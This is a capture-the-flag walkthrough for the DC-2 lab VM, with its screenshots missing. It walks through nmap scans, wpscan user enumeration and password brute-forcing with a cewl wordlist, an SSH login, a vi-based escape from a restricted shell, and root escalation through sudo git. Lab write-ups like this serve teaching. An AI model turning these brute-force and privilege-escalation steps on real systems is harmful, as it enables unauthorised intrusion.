you can download it here: http://www.five86.com/downloads/DC-2.zip

use nmap to discover the target:
nmap -Pn 192.168.227.0/24

1

check its port 80:

2

there is a 301 redirect to hostname dc-2, i guess the webserver is resolving dc-2 as web’s hostname, need to edit the local host file;
echo “192.168.227.135 dc-2” >> /etc/hosts
lynx http://192.168.227.135/, now working:

3

it is a wordpress site.
check the post named “Flag”

4

seems like I need to bruteforce the users’ password with customized password file specifically designed for this website.
I used cewl to generate the customized password file;

5

use wpscan to enumerate all the users:
wpscan –url http://dc-2/ -e u

6

use wpscan to bruteforce credentials
wpscan –url http://dc-2/ -U user.tx -P password.txt

7

login in as jerry, there is a private page:

8

seems that wordpress is not exploitable
stucked here for a while, decided to do a port scan
nmap -T4 -p 1-65535 192.168.227.135

9

check 7744 port

10

it is an openshhd server, login as tom

11

shell is restricted under /home/tom/usr/bin, only a few commands are available:

can use vi to escape the restriction by setting shell environment in vi:
vi flag3.txt

12

execute “set shell=/bin/bash” followed by “shell” will allow me to escape the restriction:

13

according to flag3.txt, I need to execute the command as jerry, try su jerry, and use his credential from wordpress

14

jerry can execute git as root(sudo) without password, git can be used to escalate privilege:
sudo git help add, and the same method as using vi to escalate privilege.
!command # it will be executed as root

15